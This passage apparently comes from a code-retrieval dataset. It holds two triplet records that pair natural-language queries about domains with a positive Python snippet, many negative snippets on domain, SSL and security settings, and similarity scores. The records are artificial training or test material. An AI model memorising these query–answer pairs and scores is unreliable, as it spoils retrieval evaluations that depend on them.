    query = query.filter(and_(Domain.sensitive, Domain.name == name))
    return database.find_all(query, Domain, {}).all()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def indomain(url, domain):\n if url and domain:\n return url.startswith(domain)\n return False", "def is_secure_site_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_secure_site_enabled\")", "def is_secure_site_enabled(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_secure_site_enabled\")", "def is_shared_with_domain(self):\n return self.has_label(SHAREDWITHDOMAIN_LABEL)", "def check_secure():\n return get_config_handler().check_secure()", "def domain_filter(self, url):\n return url_is_from_any_domain(url, self._domain)", "def filter_domain(name):\n def wrapped(request):\n \"\"\" Function used to filter request\n \"\"\"\n if request.environ.get('HTTP_HOST'):\n url = request.environ['HTTP_HOST']\n else:\n url = request.environ['SERVER_NAME']\n if url.lower() == name.lower():\n return True\n\n return False\n return wrapped", "def controlled(self):\n if self.crypt_private is not None and self.sign_private is not None:\n return True\n else:\n return False", "def condition_singleton(csp, var) :\n if len(csp.get_domain(var))==1:\n return True\n return False", "def condition_singleton(csp, var) :\n return len(csp.get_domain(var))==1", "def is_integral_domain(self):\n return False", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def captcha_protected(self):\n return settings.RECAPTCHA_ENABLE", "def _is_domain_allowed(email):\n domains = local_config.AuthConfig().get('whitelisted_domains', default=[])\n for domain in domains:\n if utils.normalize_email(email).endswith('@%s' % domain.lower()):\n return True\n\n return False", "def allow_bare_domains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def secure(self) -> bool:\n return self.get_state(self.args[CONF_OVERALL_SECURITY_STATUS]) == \"Secure\"", "def is_active_domain(self, domain=\"www.google.com\", name_server='1.1.1.1'):\n my_resolver = dns.resolver.Resolver()\n my_resolver.nameservers = [name_server]\n my_resolver.timeout = 3\n my_resolver.lifetime = 3\n try:\n A = my_resolver.query(domain, 'A')\n for i in A.response.answer:\n for j in i.items:\n return self.is_actual_ip(str(j))\n except Exception as e:\n return None", "def option_domains_always_in_scope_enabled(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/optionDomainsAlwaysInScopeEnabled/')))", "def allowed(self, request):\n try:\n sdn_enabled = stx_api.sysinv.get_sdn_enabled(request)\n return sdn_enabled\n except Exception:\n return False", "def allow_bare_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def allow_bare_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_bare_domains\")", "def insecure(self) -> bool:\n return self._insecure", "def _supports_domain(cls, domain):\n return domain in (ZZ, QQ)", "def filter_ssl(request):\n if request.scheme == 'https':\n return True\n else:\n return False", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def strict_host_key_checking(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"strict_host_key_checking\")", "def https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def 
https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def https_only(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"https_only\")", "def is_secure(self):\n return (self.nbits % 8 == 0) and (self.nbits >= params.MINIMUM_KEY_SIZE)", "def ldap_over_tls(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ldap_over_tls\")", "def is_secured_cluster(self, services):\n return services and \"cluster-env\" in services[\"configurations\"] and\\\n \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] and\\\n services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\"", "def is_secure_transport(request: Request) -> bool:\n if request.settings.INSECURE_TRANSPORT:\n return True\n return request.url.lower().startswith(\"https://\")", "def allow_glob_domains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def allow_subdomains(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def enable_ssl_verification(self) -> bool:\n return pulumi.get(self, \"enable_ssl_verification\")", "def option_domains_always_in_scope(self):\n return six.next(six.itervalues(self.zap._request(self.zap.base + 'spider/view/optionDomainsAlwaysInScope/')))", "def get_secured():\n return jsonify({'isSecured': config.requires_auth()})", "def caseSensitive(self):\n return self.__caseSensitive", "def api_domain(self) -> bool:\n return self.__api_domain", "def hide_satellite_managed():\n try:\n return strtobool(connexion.request.headers.get('Hide-Satellite-Managed', 'false'))\n except ValueError:\n return False", "def host_valid_strict(self, host: str) -> bool:\n host = host[4:] if host.startswith('www.') else 'www.' 
+ host\n return host in self.root_domains", "def __cookieFilter(self, request):\n if not self.__loaded:\n self.__load()\n \n if self.__acceptCookies == self.AcceptNever:\n res = self.__isOnDomainList(self.__exceptionsAllow,\n request.origin.host())\n if not res:\n return False\n \n if self.__acceptCookies == self.AcceptAlways:\n res = self.__isOnDomainList(self.__exceptionsBlock,\n request.origin.host())\n if res:\n return False\n \n if (\n self.__acceptCookies == self.AcceptOnlyFromSitesNavigatedTo and\n request.thirdParty\n ):\n return False\n \n return True", "def allow_subdomains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def allow_subdomains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_subdomains\")", "def verify_request(self, request, client_address):\n\n\t\tglobal configurer\n\n\t\treturn NetworkRender.allowedAddress(self.ip, client_address[0],\n\t\t\t\t\t\t\t\t\t\tconfigurer.get('ServerSecureNets'))", "def is_secure(self):\n return self._is_ssl or self._is_socket", "def whitelist_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def whitelist_domains(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def is_private(self):\n if self[:13] == '1.2.840.10008':\n return False\n\n return True", "def verify_privileged(self):\n community_text = self.fetch(self.base_url + \"/community\")\n return \"You must be logged in to see this page.\" not in community_text", "def allow_glob_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def allow_glob_domains(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_glob_domains\")", "def xforwardedforclientcert_issuerdnenabled(self) -> bool:\n return pulumi.get(self, \"xforwardedforclientcert_issuerdnenabled\")", "def __matchDomain(self, cookieDomain, siteDomain):\n if not siteDomain:\n # empty URLs always match\n return True\n \n if cookieDomain.startswith(\".\"):\n cookieDomain = cookieDomain[1:]\n if siteDomain.startswith(\".\"):\n siteDomain = siteDomain[1:]\n \n if cookieDomain == siteDomain:\n return True\n \n if not siteDomain.endswith(cookieDomain):\n return False\n \n index = siteDomain.find(cookieDomain)\n return index > 0 and siteDomain[index - 1] == \".\"", "def ssl(self) -> Optional[bool]:\n return pulumi.get(self, \"ssl\")", "def insecure_ssl(self):\n # type: () -> bool\n return self._insecure_ssl", "def is_internal_relay(request, public_key):\n if (settings.DEBUG or\n request.META.get('REMOTE_ADDR', None) in settings.INTERNAL_IPS or\n public_key in settings.SENTRY_RELAY_WHITELIST_PK):\n return True\n return False", "def test_not_on_same_domain(self):\n self.assertFalse(on_same_domain(\n \"https://google.com\",\n \"https://google.goggle.com/google.com/google\"\n ))", "def https_in_url(url):\n return True if url.startswith('https://') else False", "def is_authenticated(self):\n return self.ping() is not None", "def match_or_trust(self, host, der_encoded_certificate):\n raise NotImplementedError()", "def ldap_signing(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ldap_signing\")", "def filter_nossl(request):\n if request.scheme == 'http':\n return True\n else:\n return False", "def protected(self) -> bool:\n return pulumi.get(self, \"protected\")", "def enable_dns64(self) -> bool:\n return pulumi.get(self, \"enable_dns64\")", "def 
relevant_domains(self):\n pass", "async def protection_enabled(self) -> bool:\n response = await self._request(\"status\")\n return response[\"protection_enabled\"]", "def is_forwarded(self):\n return bool(re.match(FW_PATTERNS, self.header('Subject', '')))", "def _is_sriov_enabled(self):\n return (self._get_bios_setting('Sriov') == 'Enabled')", "def x_forwarded_for_client_cert_issuer_dn_enabled(self) -> Optional[bool]:\n return pulumi.get(self, \"x_forwarded_for_client_cert_issuer_dn_enabled\")", "def auth_domain(request):\n return request.registry.settings.get('h.auth_domain', request.domain)", "def domain(self, domain):", "def get_disable_public_fqdn(self) -> bool:\n return self._get_disable_public_fqdn(enable_validation=True)", "def http_auth_allowed(request):\n\n if request.method not in ('GET', 'HEAD'):\n return False\n if not request.is_secure() and not settings.DEBUG:\n return False\n\n ua = request.META.get('HTTP_USER_AGENT', '')\n if HTTP_AUTH_USER_AGENT.match(ua):\n return True\n else:\n return False", "def use_public_dns(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"use_public_dns\")", "def is_domain(value):\n result = any(check.isalpha() for check in value)\n return result", "def whitelist_domains(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"whitelist_domains\")", "def require_ssl(self) -> bool:\n return pulumi.get(self, \"require_ssl\")", "def is_subject_case_sensitive(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"is_subject_case_sensitive\")", "def test_acme_enabled_in_generated_config_domain_provided(self):\n conf = TestConfig()\n conf.read_config(\n yaml.safe_load(\n TestConfig().generate_config(\n \"/config_dir_path\",\n \"my_super_secure_server\",\n \"/data_dir_path\",\n tls_certificate_path=\"/tls_cert_path\",\n tls_private_key_path=\"tls_private_key\",\n acme_domain=\"my_supe_secure_server\", # This is the acme_domain\n )\n ),\n \"/config_dir_path\",\n )\n\n self.assertTrue(conf.acme_enabled)", "def host_valid_lenient(self, host: str) -> bool:\n return WebCrawler.resolve_domain(host) in self.root_domains", "def IsPriviledgedDomainUser(email):\n if email and '@' in email:\n _, user_domain = email.split('@', 1)\n return user_domain in settings.priviledged_user_domains\n\n return False", "def auth_domain(self):\n return self.__auth_domain", "def allow_ip_sans(self) -> pulumi.Output[Optional[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def _is_https_enabled(dbapi):\n if dbapi is None:\n return False\n system = dbapi.isystem_get_one()\n return system.capabilities.get('https_enabled', False)", "def pcap_contains_priv_ips(self):\n return self.contains_priv_ips", "def is_original(self):\n return is_original(self.subdomain, self.record_id)", "def ssl(self):\n return self.protocol != \"SASL_PLAINTEXT\"", "def isSiteSyndicationAllowed(self):\n return self.enabled", "def case_sensitive(self):\n\n return True", "def test_link_is_tracked_false_not_domain(self):\n self.assertFalse(link_is_tracked(\"https://thisisatest.com/\"))", "def _check_domain_already_exists_on_san_certs(self, domain_name):\n\n found = False\n found_cert = None\n for san_cert_name in self.san_cert_cnames:\n sans = utils.get_sans_by_host_alternate(\n '.'.join(\n [\n san_cert_name,\n self.driver.akamai_https_access_url_suffix\n ]\n )\n )\n if domain_name in sans:\n found = True\n found_cert = san_cert_name\n break\n\n return found, found_cert", "def know_secret(self):\r\n return(self.secret != \"\") and (self.key != \"\")", "def 
verify_server_certificate(self):\n return self._verify_server_certificate", "def is_ssl(self):\n return self._is_ssl", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")", "def allow_ip_sans(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"allow_ip_sans\")" ]
[ "0.5945297", "0.5943389", "0.5943389", "0.58801776", "0.5860374", "0.5823208", "0.58100474", "0.5775172", "0.57475305", "0.57442623", "0.57067436", "0.56709236", "0.56709236", "0.56709236", "0.56595856", "0.56003463", "0.55976045", "0.5583748", "0.5570339", "0.5522135", "0.5515378", "0.5515378", "0.5505999", "0.5490891", "0.54883003", "0.5410126", "0.5410126", "0.5410126", "0.53990966", "0.53990966", "0.53990966", "0.53983855", "0.53854847", "0.5376952", "0.536806", "0.535918", "0.535591", "0.5353072", "0.53308517", "0.5328432", "0.5324344", "0.5323078", "0.5309566", "0.52861387", "0.52853173", "0.5283083", "0.5283083", "0.5271097", "0.5251491", "0.5225787", "0.5225787", "0.5217423", "0.52013975", "0.5171926", "0.5171926", "0.517003", "0.51642644", "0.516412", "0.5158139", "0.51404136", "0.5124436", "0.5118156", "0.51123977", "0.5112296", "0.5108052", "0.5107305", "0.51070935", "0.50977093", "0.5095138", "0.50937885", "0.50912493", "0.508518", "0.50795174", "0.5070356", "0.5065957", "0.50537205", "0.50250447", "0.5021282", "0.5019958", "0.5019867", "0.50190675", "0.501853", "0.50152856", "0.50105643", "0.50065404", "0.5006147", "0.5002671", "0.49956432", "0.49925447", "0.497911", "0.4977031", "0.49751142", "0.49706233", "0.4969548", "0.49665666", "0.49645495", "0.49601236", "0.49576476", "0.4955801", "0.4955801" ]
0.7324499
0
Create a new domain
def create(name, sensitive):
    domain = Domain(name=name, sensitive=sensitive)
    return database.create(domain)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_domain(DomainName=None):\n pass", "def create_domain(self, domain: str) -> Session:\n uri = f\"{self.uri}/domains\"\n data = {\n \"hostname\": domain\n }\n response = self.request(uri=uri, method=\"POST\", data=data)\n\n return response", "def create_domain(self, domain_name):\r\n params = {'DomainName':domain_name}\r\n d = self.get_object('CreateDomain', params, Domain)\r\n d.name = domain_name\r\n return d", "def create_domain(domain_id, default_role):\n tx = iroha.transaction(\n [iroha.command(\"CreateDomain\", domain_id=domain_id, default_role=\"user\")]\n )\n ic.sign_transaction(tx, user_private_key)\n send_transaction_print_status_and_return_result(tx)", "def create_domain(self, domain_name):\n params = {'DomainName': domain_name}\n d = self.get_object('CreateDomain', params, Domain)\n d.name = domain_name\n return d", "def create_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n print self.project_info\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains\"\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", \"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"POST\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while creating domain\")\n print (\"No response from Server while creating domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\" Creating domain Failed with status %s \"\n \"and error : %s\" % (response.status, response.data))\n print (\" Creating domain Failed with status %s and error : %s \" %\n (response.status, response.data))\n return response.status\n\n output = json.loads(response.data)\n LOG_OBJ.info(\"Domain details : %s \" % output)\n print (\"Domain details : %s \" % output)\n return output['domain']['id']", "def createDomain(schemaName, domain):\n return \"\"\"CREATE DOMAIN \\\"{schema_name}\\\".\\\"{domain_name}\\\" AS {type_name}\"\"\".format(\n schema_name = schemaName,\n domain_name = domain.name,\n type_name = getType(domain)\n )", "def create_domain(self, url_data, service_id, service_version):\n request_dict = {k: v[0] for k, v in url_data}\n domain_name = request_dict['name']\n\n create_domain = {\n 'comment': '',\n 'service_id': service_id,\n 'version': service_version,\n 'name': domain_name}\n\n if 'domain_list' not in self.fastly_cache[service_id]:\n self.fastly_cache[service_id]['domain_list'] = []\n\n self.fastly_cache[service_id]['domain_list'].append(\n [create_domain, 'None', 'False'])\n return create_domain", "def create(self, domain, master=True, **kwargs):\n params = {\n \"domain\": domain,\n \"type\": \"master\" if master else \"slave\",\n }\n params.update(kwargs)\n\n result = self.client.post(\"/domains\", data=params)\n\n if not \"id\" in result:\n raise UnexpectedResponseError(\n \"Unexpected response when creating Domain!\", json=result\n )\n\n d = Domain(self.client, result[\"id\"], result)\n return d", "def createDomain(self):\n if not self.rank:\n logging.info('Creating domain')\n\n if 'box' in self.pargs:\n self.lmp.command('region domain block ' + ('{} ' * len(self.pargs['box'])).format(*self.pargs['box']) + ' units box volume_limit 1e-20')\n elif 'cylinder' in self.pargs:\n self.lmp.command('region domain cylinder ' + 
('{} ' * len(self.pargs['cylinder'])).format(*self.pargs['cylinder']) + ' units box volume_limit 1e-20') \n\n self.lmp.command('create_box {} domain'.format(self.pargs['nSS']))", "def CreateDomain(self, request):\n try:\n params = request._serialize()\n headers = request.headers\n body = self.call(\"CreateDomain\", params, headers=headers)\n response = json.loads(body)\n model = models.CreateDomainResponse()\n model._deserialize(response[\"Response\"])\n return model\n except Exception as e:\n if isinstance(e, TencentCloudSDKException):\n raise\n else:\n raise TencentCloudSDKException(type(e).__name__, str(e))", "def create(self, domain, active=True):\n url = self._api_url\n data = {\n \"name\": domain, \"description\": \"created by REST API\", \"active\": active,\n \"delegations\":[{\"orgId\":6125,\"certTypes\":[\"SSL\"]}]\n }\n result = self._client.post(url, data=data)", "def post_domain_create(self, resource_dict):\n pass", "def create_domain(self, domain_name, check=True):\n domain = self._client.create(domain_name)\n\n if check:\n self.check_domain_presence(domain)\n\n return domain", "def test_create_email_domain(self):\n email_dom = 'create.domain.loc'\n org = 'o=%s' % (self.org_name)\n dn = '%s,%s' % (org, self.base_dn)\n dn_info = {self.smtp_domain: [self.email_dom, email_dom]}\n expected_result = [(dn, dn_info)]\n domain = SpokeEmailDomain(self.org_name)\n result = domain.create(email_dom)['data']\n self.assertEqual(result, expected_result)", "def createManagedDomain():\n selectCustomTemplate(localTemplate)\n loadTemplates()\n # set the Node Manager listen address and listen port.\n cd('/')\n cd('NMProperties')\n set('ListenAddress', hostname)\n #create the domain\n writeDomain(domainPath)", "def Create(self, domainsList) :\n\t\t...", "def create(self):\n\n if self.call(method='addSubdomain', args=[self.domainname, self.subdomain]):\n return self", "def add_new_domain(self):\n\n domain = self.dlg.uComboBoxDomain.currentText()\n\n if domain in self.domains:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: Domains must be unique. \" \"Please edit the domain below\"\n )\n return\n\n if len(self.domains) >= 10:\n self.dlg.uWarningSettings.show()\n self.dlg.uWarningSettings.setText(\n \"Warning: You can only store up to . 
\" \"10 domain entries\"\n )\n return\n\n if domain == \"OTHER\":\n domain = \"\"\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).setText(\n domain\n )\n getattr(self.dlg, \"uTextDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uTextAPIKey{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnRemoveDomain{0}\".format(len(self.domains) + 1)).show()\n getattr(self.dlg, \"uBtnSaveDomain{0}\".format(len(self.domains) + 1)).show()\n self.dlg.uWarningSettings.hide()", "def setup_domain(domain):\n bucket = BUCKET_MANAGER.get_bucket(domain)\n\n zone = DOMAIN_MANAGER.find_hosted_zone(domain) \\\n or DOMAIN_MANAGER.create_hosted_zone(domain)\n\n endpoint = util.get_endpoint(BUCKET_MANAGER.get_region_name(bucket))\n a_record = DOMAIN_MANAGER.create_s3_domain_record(zone, domain, endpoint)\n print(\"Domain configure: http://{}\".format(domain))\n print(\"A record created: {}\".format(a_record))", "def add_domain():\n\n today = date.today()\n\n if request.method == \"POST\":\n # Check to see if domain already exists because\n # duplicate domain names aren't allowed\n domain = session.query(Domain).filter_by(\n domain_name=request.form[\"domain-name\"]).first()\n if domain:\n message = \"{}Error!{} {}{}{} already exists.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n\n # Find existing Provider otherwise create new Provider object\n provider = session.query(Provider).filter(\n Provider.provider_url == request.form[\"provider-url\"]).first()\n if not provider:\n provider = Provider(provider_url=request.form[\"provider-url\"])\n\n # Get existing category name object from CategoryName table\n category_name = session.query(CategoryName).filter(\n CategoryName.name == request.form[\"category\"]).first()\n\n domain = Domain(\n category=Category(),\n domain_name=request.form[\"domain-name\"],\n ip=request.form[\"ip-address\"],\n provider=provider)\n domain.category.category_name = category_name\n domain.status.append(Status(status_type=\"added\"))\n domain.is_active = request.form.get(\"is-active\", False)\n domain.is_monitored = request.form.get(\"is-monitored\", False)\n\n # Convert date string from form to date object\n exp_date = datetime.strptime(request.form.get(\"exp-date\"),\n \"%Y-%m-%d\").date()\n domain.exp_date = exp_date\n\n session.add(domain)\n\n try:\n session.commit()\n message = \"{}Success!{} Added {}{}{} successfully.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message , \"success\")\n except:\n session.rollback()\n message = \"{}Error!{} Could not add add {}{}{}.\".format(\n \"<strong>\", \"</strong>\", \"<em>\", domain.domain_name, \"</em>\")\n flash(message, \"danger\")\n\n if request.form[\"submit\"] == \"Submit\":\n return redirect(url_for(\"home\"))\n else:\n return redirect(url_for(\"add_domain\", today=today,\n category_names=category_names))\n else:\n return render_template(\"add_domain.html\", today=today,\n category_names=category_names)", "def set_keystone_v3_domain(self, **kwargs):\n LOG_OBJ.debug(\"Creating the domain.\")\n\n _url = \"http://\" + self.host_ip + \":35357/v3/domains/\" + \\\n str(kwargs['domain_id'])\n _headers = {'x-auth-token': self.cloud_admin_info[\"token_domain\"],\n 'content-type': 'application/json'}\n\n _domain_info = {\"domain\": {}}\n for argument in [\"name\", \"description\", \"enabled\", 
\"disabled\"]:\n try:\n _domain_info['domain'].update(\n {argument: kwargs[argument]})\n except KeyError:\n pass\n _body = json.dumps(_domain_info)\n response = self.request(\"PATCH\", _url, _headers, _body)\n\n if response is None:\n LOG_OBJ.error(\"No response from Server while set the domain\")\n print (\"No response from Server while set the domain\")\n return response\n\n if response.status not in [200, 201, 202, 203, 204]:\n LOG_OBJ.error(\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n print (\"Set domain Failed with status %s and error : %s\" %\n (response.status, response.data))\n return response.status\n return True", "def test_create_domain_only(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = self.create_domain_only_args\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n if type == \"master\":\n _type = 0\n elif type == \"slave\":\n _type = 1\n if extra:\n dyn = extra.get(\"DYN\") or 1\n else:\n dyn = 1\n params = {\"DOMAIN\": domain, \"TYPE\": _type}\n action = \"/api_dns_new_domain.asp\"\n if self.reseller_id is not None:\n params[\"DYN\"] = dyn\n action = \"/api_dns_new_domain_reseller.asp\"\n self.connection.request(action, params=params)\n zone = self.get_zone(domain)\n if ttl is not None:\n zone = self.update_zone(zone, zone.domain, ttl=ttl)\n return zone", "def create_or_show_domain(name):\n manager = get_manager()\n domain_id = manager.resolve_domain_id(name)\n if domain_id:\n log(\"Domain '%s' already exists.\" % name, level=DEBUG)\n else:\n manager.create_domain(domain_name=name,\n description='Created by Juju')\n log(\"Created new domain: %s\" % name, level=DEBUG)\n domain_id = manager.resolve_domain_id(name)\n return domain_id", "def domain_create(self, domain, contact_info, raw=True, **kwargs):\n endpoint = '/Domain/Create'\n\n params = {\n 'Domain' : domain\n }\n\n params.update(contact_info)\n params.update(kwargs)\n\n response = self.__perform_get_request(endpoint, params)\n\n if response.status_code == 200:\n parsed_response = response.json()\n if raw:\n return parsed_response\n else:\n return parsed_response['product'][0]['status'] == 'SUCCESS'", "def create_all(self):\n for name in self.app.config['SIMPLE_DOMAINS']:\n self.connection.create_domain(name)", "def create_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:\n pass", "def domain(self, domain):", "def test_create_domain_with_a_record(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n a_record = [{\n \"type\": \"A\",\n \"name\": \"ftp.example.com\",\n \"data\": \"192.0.2.8\",\n \"ttl\": 3600\n }]\n t['Resources']['domain']['Properties']['records'] = a_record\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = self._get_create_args_with_comments(a_record)\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def setup_domains():\n sdb = boto.connect_sdb()\n sdb.create_domain(\"mls_domain\")", "def create_type_A_domain(self, domain, 
point_to):\n r53 = self.connections.get_route53()\n # Get Zone ID\n zone = r53.get_zone(self.env_domain)\n zone_id = zone.id", "def CreateDomain(self, body_DomainPurchase):\n body_DomainPurchase._check_essential()\n\n response = self.client.http_post(\"/v4/domains\", body=json.dumps(body_DomainPurchase))\n return parse_response(response, DomainPurchaseResult)", "def Fcp_Create(domain_name,lun_interval):\n\n host1 = api.hosts.list()[0]\n storage_ = host1.storage.list()\n fcp_storage = params.Storage(type_='fcp',\n volume_group=params.VolumeGroup())\n SD = params.StorageDomain(name=domain_name,format='True',\n host=host1,type_='data',storage_format='v3')\n storage_len = len(storage_)\n Lun_list = list()\n for x in range (0,storage_len):\n try:\n if storage_[x].get_type() == None:\n Lun_list.append(storage_[x].get_logical_unit()[0])\n if storage_[x].get_type() == 'nfs':\n raise Exception('nfs?')\n if storage_[x].get_type() == 'glusterfs':\n raise Exception('gluster?')\n except Exception,e:\n print \"caught\", e\n continue\n try:\n if len(Lun_list) == 0:\n raise Exception('operation stopped, no Fc Luns')\n except Exception,e:\n print e\n return\n else:\n fcp_storage.set_logical_unit(Lun_list[lun_interval[0]:\n lun_interval[1]])\n SD.set_storage(fcp_storage)\n try:\n NewSd = api.storagedomains.add(SD)\n except Exception,e:\n print \"A problem caught during creating the domain --->\",e\n return\n api.datacenters.list()[0].storagedomains.add(NewSd)", "def _create_entity_in_domain(entity_type, domain_id):\n if entity_type == 'users':\n new_entity = unit.new_user_ref(domain_id=domain_id)\n new_entity = self.identity_api.create_user(new_entity)\n elif entity_type == 'groups':\n new_entity = unit.new_group_ref(domain_id=domain_id)\n new_entity = self.identity_api.create_group(new_entity)\n elif entity_type == 'roles':\n new_entity = self._create_role(domain_id=domain_id)\n else:\n # Must be a bad test plan\n raise exception.NotImplemented()\n return new_entity", "def pre_domain_create(self, resource_dict):\n pass", "def create_zone(self, domain, type=\"master\", ttl=None, extra=None):\n params = {\"name\": domain}\n try:\n params[\"ip_address\"] = extra[\"ip\"]\n except Exception:\n params[\"ip_address\"] = \"127.0.0.1\"\n\n res = self.connection.request(\"/v2/domains\", data=json.dumps(params), method=\"POST\")\n\n return Zone(\n id=res.object[\"domain\"][\"name\"],\n domain=res.object[\"domain\"][\"name\"],\n type=\"master\",\n ttl=1800,\n driver=self,\n extra={},\n )", "def perform_create(self, serializer):\n instance = serializer.save(\n domain=self.org_safe_get(self.request.user, self.kwargs.get('pk')))", "def test_create_email_domain_twice(self):\n email_dom = 'twins.domain.loc'\n domain = SpokeEmailDomain(self.org_name)\n domain.create(email_dom)\n self.assertRaises(error.AlreadyExists, domain.create, email_dom)\n domain.delete(email_dom)", "def add(self, newaddress):\n list = newaddress.split(\"@\")\n newdomain = list[-1]\n if not newdomain in self.__domainlist:\n self.__domainlist.append(newdomain)\n else:\n print(\"Domain is already in the database\")", "def test_create_domain_with_mx_record(self):\n fake_dns_instance = FakeDnsInstance()\n t = template_format.parse(domain_only_template)\n mx_record = [{\n \"type\": \"MX\",\n \"name\": \"example.com\",\n \"data\": \"mail.example.com\",\n \"priority\": 5,\n \"ttl\": 3600\n }]\n t['Resources']['domain']['Properties']['records'] = mx_record\n instance = self._setup_test_cloud_dns_instance('dnsinstance_create', t)\n create_args = 
self._get_create_args_with_comments(mx_record)\n self._stubout_create(instance, fake_dns_instance, **create_args)\n scheduler.TaskRunner(instance.create)()\n self.assertEqual((instance.CREATE, instance.COMPLETE), instance.state)\n self.m.VerifyAll()", "def _adddomain(self, domain: Domain):\n\n domain = copy.deepcopy(domain)\n if self.model is not None:\n # Check that model and domain are compatible\n self._validate_model_domain(self.model, domain)\n\n # Add in domain\n self.domain = domain\n\n # Setup base namelists\n self._set_base_namelists()\n else:\n self.domain = domain", "def create_physical_domain(self, physical_domain_name, vlan_pool_dn):\n DomP_mo = DomP('uni/', physical_domain_name)\n self.commit(DomP_mo)\n if vlan_pool_dn is not None:\n RsVlanNs_mo = RsVlanNs(DomP_mo.dn)\n RsVlanNs_mo.tDn = vlan_pool_dn\n self.commit(RsVlanNs_mo)\n return DomP_mo", "def create_site(apps, schema_editor):\n return site_models.Site.objects.create(\n name='The SATNet Network',\n domain='localhost:8000'\n )", "def create_tenant(name, domain):\n manager = get_manager()\n tenant = manager.resolve_tenant_id(name, domain=domain)\n if not tenant:\n manager.create_tenant(tenant_name=name,\n domain=domain,\n description='Created by Juju')\n log(\"Created new tenant '%s' in domain '%s'\" % (name, domain),\n level=DEBUG)\n return\n\n log(\"Tenant '%s' already exists.\" % name, level=DEBUG)", "def _domain(self):\n if self.__domain is None:\n self.__domain = Domain(\n definition='Need domain definition?',\n updatable='False',\n optional='False',\n )\n self._ident[self._domain_name] = self.__domain\n self._data_record.domain_ids = [self._domain_name,]\n return self.__domain", "def __init__(__self__, *,\n domain: pulumi.Input[str]):\n pulumi.set(__self__, \"domain\", domain)", "def __init__(__self__, *,\n domain: pulumi.Input[str]):\n pulumi.set(__self__, \"domain\", domain)", "def generate_domainname():\n domainname 